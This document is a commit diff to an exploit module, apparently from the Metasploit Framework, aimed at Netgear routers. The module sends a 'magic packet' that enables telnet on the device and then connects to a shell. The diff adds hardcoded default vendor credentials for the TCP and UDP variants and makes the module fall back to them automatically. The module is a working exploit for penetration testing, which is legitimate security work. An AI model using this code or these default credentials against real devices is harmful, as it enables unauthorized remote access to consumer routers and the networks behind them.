Use default creds specific to protocol

2018-03-02 06:20:21 -06:00 · 2018-03-02 06:20:21 -06:00 · fba30d47a2
parent 1f40afea9c
commit fba30d47a2
1 changed files with 26 additions and 11 deletions
--- a/modules/exploits/linux/telnet/netgear_telnetenable.rb
+++ b/modules/exploits/linux/telnet/netgear_telnetenable.rb
@ -39,9 +39,19 @@ class MetasploitModule < Msf::Exploit::Remote
        }
      },
      'Targets'            => [
-        ['Automatic (detect TCP or UDP)', proto: :auto],
-        ['TCP (typically older devices)', proto: :tcp],
-        ['UDP (typically newer devices)', proto: :udp]
+        ['Automatic (detect TCP or UDP)',
+          proto:    :auto
+        ],
+        ['TCP (typically older devices)',
+          proto:    :tcp,
+          username: 'Gearguy',
+          password: 'Geardog'
+        ],
+        ['UDP (typically newer devices)',
+          proto:    :udp,
+          username: 'admin',
+          password: 'password'
+        ]
      ],
      'DefaultTarget'      => 0
    ))
@ -49,13 +59,15 @@ class MetasploitModule < Msf::Exploit::Remote
    register_options([
      Opt::RPORT(23),
      OptString.new('MAC',      [true, 'MAC address of device']),
-      OptString.new('USERNAME', [true, 'Username on device', 'Gearguy']),
-      OptString.new('PASSWORD', [true, 'Password on device', 'Geardog'])
+      OptString.new('USERNAME', [false, 'Username on device']),
+      OptString.new('PASSWORD', [false, 'Password on device'])
    ])
  end

  def exploit
-    @proto = target[:proto]
+    @proto    = target[:proto]
+    @username = datastore['USERNAME'] || target[:username]
+    @password = datastore['PASSWORD'] || target[:password]

    # Detect TCP or UDP
    if @proto == :auto
@ -71,6 +83,13 @@ class MetasploitModule < Msf::Exploit::Remote
      end
    end

+    # Try to use default creds
+    unless @username && @password
+      tgt = targets.find { |t| t[:proto] == @proto }
+      @username = tgt[:username]
+      @password = tgt[:password]
+    end
+
    # Shell it
    exploit_telnetenabled
    connect_telnetd
@ -79,11 +98,7 @@ class MetasploitModule < Msf::Exploit::Remote
  def exploit_telnetenabled
    # Generate the magic packet
    print_status('Generating magic packet')
-    payload = magic_packet(
-      datastore['MAC'],
-      datastore['USERNAME'],
-      datastore['PASSWORD']
-    )
+    payload = magic_packet(datastore['MAC'], @username, @password)

    # Send the magic packet via TCP or UDP
    begin